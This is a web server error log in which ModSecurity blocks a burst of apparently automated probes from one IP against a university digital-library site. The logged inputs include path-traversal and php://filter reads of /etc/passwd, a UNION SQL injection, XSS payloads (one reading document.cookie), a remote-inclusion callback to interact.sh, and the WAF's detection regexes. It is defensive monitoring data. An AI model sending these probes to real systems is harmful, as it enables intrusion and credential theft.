[Tue Aug 29 11:53:27.475818 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAoLfTcAAAAG"]
[Tue Aug 29 11:53:27.559122 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAn406IAAAAW"]
[Tue Aug 29 11:53:28.044511 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15yMCo-f0AAAor7skAAAAk"]
[Tue Aug 29 11:53:28.112389 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAolKXMAAAAe"]
[Tue Aug 29 11:53:28.817057 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAofm8EAAAAX"]
[Tue Aug 29 11:53:28.908701 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15yMCo-f0AAAot8QMAAAAn"]
[Tue Aug 29 11:53:29.379916 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15ycCo-f0AAAoesO0AAAAV"]
[Tue Aug 29 11:53:30.558998 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15ysCo-f0AAAoyGzsAAAAI"]
[Tue Aug 29 11:53:30.595642 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAoPub4AAAAM"]
[Tue Aug 29 11:53:31.233495 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAo2m38AAAAA"]
[Tue Aug 29 11:53:33.896938 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15zcCo-f0AAAolKYAAAAAe"]
[Tue Aug 29 11:53:34.145048 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zsCo-f0AAAoUJcEAAAAB"]
[Tue Aug 29 11:53:35.898395 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAoT7Z8AAAAD"]
[Tue Aug 29 11:53:37.331394 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAoz73sAAAAS"]
[Tue Aug 29 11:53:39.077326 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAoW7SoAAAAJ"]
[Tue Aug 29 11:53:41.905562 2023] [:error] [pid 2615] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAAo3IfoAAAAa"]
[Tue Aug 29 11:53:42.551468 2023] [:error] [pid 2615] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAAo3If4AAAAa"]
[Tue Aug 29 11:53:42.676745 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAnHQtcAAAAT"]
[Tue Aug 29 11:53:43.607302 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAAoPudIAAAAM"]
[Tue Aug 29 11:53:43.713548 2023] [:error] [pid 2634] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAApKaw8AAAAZ"]
[Tue Aug 29 11:53:45.543509 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAAoGFe4AAAAE"]
[Tue Aug 29 11:53:45.627688 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAApJDTMAAAAY"]
[Tue Aug 29 11:53:45.671471 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAApJDTQAAAAY"]
[Tue Aug 29 11:53:47.103387 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAAofm@QAAAAX"]
[Tue Aug 29 11:53:47.863470 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO1528Co-f0AAAoW7UoAAAAJ"]
[Tue Aug 29 11:53:50.804633 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAAoPuegAAAAM"]
[Tue Aug 29 11:53:51.692560 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/product.php"] [unique_id "ZO1538Co-f0AAAot8UQAAAAn"]
[Tue Aug 29 11:53:51.727722 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAAo2m7wAAAAA"]
[Tue Aug 29 11:53:52.802893 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154MCo-f0AAApHRWoAAAAP"]
